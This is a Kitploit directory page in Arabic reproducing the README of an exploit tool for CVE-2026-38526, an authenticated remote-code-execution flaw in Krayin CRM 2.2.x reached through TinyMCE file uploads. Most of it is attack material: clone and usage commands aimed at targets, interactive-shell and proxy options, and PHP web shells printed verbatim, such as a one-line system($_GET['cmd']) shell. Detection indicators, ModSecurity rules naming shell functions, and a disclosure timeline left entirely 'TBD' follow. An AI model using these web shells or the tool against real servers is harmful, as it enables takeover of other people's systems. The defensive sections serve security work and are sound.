Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 استغلال ثغرة في Krayin CRM الإصدار 2.2.x - تنفيذ أوامر عن بُعد (RCE) بعد المصادقة عبر تجاوز رفع ملفات TinyMCE. الميزات: شيل تفاعلي، حمولات متعددة الأنواع، إنشاء تلقائي للشيل، والتحقق. المؤلف: Sudeepa Wanigarathna. للاختبار المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتوليد شيفرة القشرة
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 استغلال ثغرة في Krayin CRM الإصدار 2.2.x - تنفيذ أوامر عن بُعد (RCE) بعد المصادقة عبر تجاوز رفع ملفات TinyMCE. الميزات: شيل تفاعلي، حمولات متعددة الأنواع، إنشاء تلقائي للشيل، والتحقق. المؤلف: Sudeepa Wanigarathna. للاختبار المصرح به فقط.

عرض المستودع
37منذ شهر واحدلم تتم المراجعة بعد
مشاركة

🔓 كراين CRM الإصدار 2.2.x - استغلال تنفيذ التعليمات البرمجية عن بُعد الموثَّق

License: MIT CVE-2026-38526

⚠️ لأغراض اختبار الأمن المصرح به فقط - الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

📋 نظرة عامة

تثبت أداة الاستغلال هذه وجود ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) تم اكتشافها في Krayin CRM الإصدار 2.2.x. توجد الثغرة في وظيفة رفع الملفات في TinyMCE، والتي تسمح للمسؤولين الموثَّقين برفع وتنفيذ كود PHP عشوائي على الخادم.

الخاصيةالقيمة
معرف CVECVE-2026-38526
البرنامج المتأثركراين CRM الإصدار 2.2.x
نوع الثغرةتنفيذ التعليمات البرمجية عن بُعد (RCE) موثَّق
مطلوب مصادقةنعم (صلاحيات مدير)
التأثيراختراق كامل للنظام
درجة CVSS8.8 (عالية)

🚨 تفاصيل الثغرة

تنشأ الثغرة من عدم كفاية التحقق من نوع الملف في نقطة رفع ملفات TinyMCE (/admin/tinymce/upload). يمكن للمسؤول الموثَّق:

  • رفع ملف PHP مُقنّع بنوع MIME صورة.
  • يتم تخزين الملف في موقع يمكن الوصول إليه عبر الويب.
  • يمكن للمهاجم بعد ذلك تنفيذ كود PHP عشوائي على الخادم.

الإصدارات المتأثرة

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • جميع إصدارات 2.2.x قبل إصدار التصحيح

✨ الميزات

  • أنواع شيل متعددة: أساسي، متقدم، بسيط، مدير ملفات، ومخصص.
  • شيل تفاعلي: واجهة كاملة تشبه الطرفية مع سجل الأوامر.
  • رفع الملفات: رفع ملفات إضافية عبر الشيل.
  • استخراج رمز CSRF: معالجة تلقائية لحماية CSRF.
  • دعم البروكسي: توجيه حركة المرور عبر بروكسيات HTTP/HTTPS.
  • تنسيقات مخرجات مرنة: نص، JSON، أو وضع صامت.
  • منطق إعادة المحاولة: إعادة محاولة تلقائية عند فشل الاتصال.
  • ترويسات مخصصة: دعم ترويسات HTTP مخصصة.
  • وضع تفصيلي: مخرجات تصحيح مفصلة.
  • دعم SSL: التحقق الاختياري من شهادات SSL.

📦 التثبيت

المتطلبات

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

التثبيت السريع

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

ملف المتطلبات (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 الاستخدام

صيغة الأمر الأساسية

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

المعاملات المطلوبة

المعاملالوصف
-t, --targetعنوان URL الهدف (مثال: http://192.168.1.100)
-u, --usernameاسم مستخدم المدير أو البريد الإلكتروني
-p, --passwordكلمة مرور المدير

أمثلة استخدام شائعة

root@kitploit:~
# Basic exploitation with generated shell
python3 exploit.py -t http://target.com -u [email protected] -p password

# Upload custom PHP shell file
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generate advanced shell with interactive mode
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generate shell file without exploitation
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Use with proxy for testing/debugging
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# JSON output for automation
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Verbose mode with custom timeout
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# Custom User-Agent and headers
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 أنواع الشيل

  1. شيل أساسي (basic) تنفيذ أوامر بسيط باستخدام دالة system().

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. شيل متقدم (advanced) شيل غني بالميزات مع:

    • طرق متعددة لتنفيذ الأوامر
    • واجهة ويب جميلة تشبه الطرفية
    • دعم سجل الأوامر
    • عرض المستخدم الحالي واسم المضيف
  3. شيل بسيط (minimal) بصمة ضئيلة للتمويه.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. مدير الملفات (file_manager) واجهة إدارة ملفات كاملة:

    • رفع الملفات
    • حذف الملفات
    • إنشاء الدليل
    • التنقل
    • عارض صلاحيات الملفات
  5. شيل مخصص (custom) استخدم ملف شيل PHP الخاص بك مع المعامل -f.

📝 تنسيقات المخرجات

تنسيق النص (افتراضي)

مخرجات ملونة قابلة للقراءة البشرية مناسبة للاستخدام التفاعلي.

تنسيق JSON (-o json)

تنسيق قابل للقراءة الآلية للأتمتة والتكامل.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

التنسيق الصامت (-q, --quiet)

لا مخرجات باستثناء الأخطاء. مفيد للمعالجة الدفعية.

⚙️ الخيارات المتقدمة

الخيارالوصفالافتراضي
--timeoutمهلة الطلب بالثواني30
--retryعدد محاولات إعادة المحاولة3
--retry-delayالتأخير بين المحاولات بالثواني2
--user-agentسلسلة User-Agent مخصصةوكيل المستخدم الافتراضي للمتصفح
--headerترويسات HTTP مخصصة (مفتاح: قيمة)لا شيء
--verify-sslالتحقق من شهادات SSLخطأ
--proxyعنوان URL بروكسي HTTP/HTTPSلا شيء
-v, --verboseتمكين مخرجات التصحيحخطأ
-q, --quietكتم جميع المخرجاتخطأ

مثال الترويسات المخصصة

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 الكشف والوقاية

علامات الاختراق (IoC)

  • الملفات التي يجب مراقبتها:

    • ملفات PHP غير عادية في public/storage/upload/
    • ملفات ذات امتدادات مزدوجة (مثل image.php.jpg)
    • ملفات جديدة بأسماء مشبوهة
  • السجلات التي يجب فحصها:

    • طلبات POST إلى /admin/tinymce/upload
    • أوقات تسجيل دخول إدارية غير عادية
    • محاولات مصادقة فاشلة
  • مؤشرات النظام:

    • عمليات غير متوقعة قيد التشغيل
    • وظائف cron جديدة
    • ملفات نظام معدلة

إجراءات الوقاية

  • إجراءات فورية:

    root@kitploit:~
    # Update to patched version
    composer update krayin/crm
    
    # Disable admin access temporarily
    # Remove unnecessary admin accounts
    # Change all admin passwords
    
  • تعزيز أمن رفع الملفات:

    root@kitploit:~
    // Validate file type by content, not just extension
    // Implement content security policy
    // Use Web Application Firewall (WAF)
    // Enable file upload scanning
    
  • التحكم في الوصول:

    root@kitploit:~
    # Restrict admin IPs in .htaccess
    # Implement MFA for admin accounts
    # Regular admin audit
    # Session timeout policies
    
  • قواعد WAF (ModSecurity):

    root@kitploit:~
    # Block suspicious file uploads
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Block web shells
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ الإفصاح المسؤول

تم اكتشاف هذه الثغرة من خلال بحث أمني مسؤول. اتبعت عملية الإفصاح هذه الخطوات:

  • الاكتشاف: تم تحديد الثغرة أثناء تقييم أمني.
  • التحقق: تأكيد وجود الثغرة في Krayin CRM 2.2.x.
  • الإبلاغ: إخطار مطوري Krayin CRM بشكل خاص.
  • التنسيق: العمل مع الفريق لتطوير إصلاح.
  • التصحيح: انتظار إصدار التصحيح الرسمي.
  • الإفصاح: الإفصاح العام بعد توفر التصحيح.

الجدول الزمني

  • الاكتشاف: TBD
  • تم الإبلاغ: TBD
  • تم إصدار التصحيح: TBD
  • الإفصاح العام: TBD

📜 إخلاء المسؤولية

root@kitploit:~
THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE 
OF THIS SOFTWARE.

USE OF THIS TOOL FOR ANY PURPOSE OTHER THAN AUTHORIZED SECURITY TESTING 
IS ILLEGAL AND UNETHICAL. THE AUTHOR TAKES NO RESPONSIBILITY FOR 
UNAUTHORIZED USE OR ANY DAMAGES CAUSED BY THIS TOOL.

🔧 استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

  • المشكلة: فشل المصادقة

    • الحل: تحقق من بيانات الاعتماد، وتأكد من مسار تسجيل الدخول الإداري هو /admin/login
    • التحقق: تأكد من عمل استخراج رمز CSRF بشكل صحيح
  • المشكلة: فشل رفع الملف

    • الحل: تحقق من صلاحيات الملف، وتأكد من وجود نقطة رفع
    • التحقق: تأكد من أن الهدف يستخدم محرر TinyMCE
  • المشكلة: لا ينفذ الشيل الأوامر

    • الحل: تحقق من عدم تعطيل دوال PHP في php.ini
    • التحقق: اختبر بأمر بسيط مثل echo test
  • المشكلة: أخطاء شهادة SSL

    • الحل: استخدم العلامة --verify-ssl أو عطل التحقق
    • ملاحظة: ستسبب الشهادات ذاتية التوقيع أخطاء بدون تحقق مناسب

وضع التصحيح

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://target.com -u admin -p pass -v

# With proxy (Burp Suite, etc.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 المساهمة

المساهمات مرحب بها! يرجى التأكد من:

  • جميع الأكواد تم اختبارها بشكل صحيح.
  • تم تحديث التوثيق.
  • اتباع الإرشادات الأخلاقية.
  • إجراء بحث الثغرات بمسؤولية.

📚 المراجع

  • الموقع الرسمي لـ Krayin CRM
  • CVE-2026-38526
  • OWASP تنفيذ التعليمات البرمجية عن بُعد
  • أفضل الممارسات الأمنية في PHP

⭐ الدعم

إذا وجدت هذه الأداة مفيدة لأبحاث الأمن، فيرجى التفكير في:

  • ⭐ وضع نجمة على المستودع
  • 🔔 المتابعة للحصول على التحديثات
  • 📢 المشاركة مع باحثي الأمن الآخرين

تم إنشاؤها بـ ❤️ لأبحاث الأمن

تذكر: القوة العظيمة تأتي بمسؤولية عظيمة. استخدم هذه المعرفة بحكمة!

📊 بطاقة مرجعية سريعة للأوامر

root@kitploit:~
# Quick reference
python3 exploit.py -t URL -u USER -p PASS [OPTIONS]

# Options:
#   -f FILE           Upload custom shell
#   --shell-type TYPE Basic|Advanced|Minimal|File_Manager|Custom
#   -i                Interactive mode
#   --proxy URL       HTTP proxy
#   -v                Verbose output
#   -o json           JSON output
#   --generate-only   Create shell without exploiting
#   --timeout SEC     Request timeout
#   --retry N         Retry count
#   --user-agent UA   Custom User-Agent
#   --header "K: V"   Custom headers
#   --verify-ssl      Verify SSL certificates
#   -q, --quiet       Suppress output

🔒 تذكر: احصل دائمًا على إذن كتابي قبل اختبار أي نظام!

تنزيل الأداة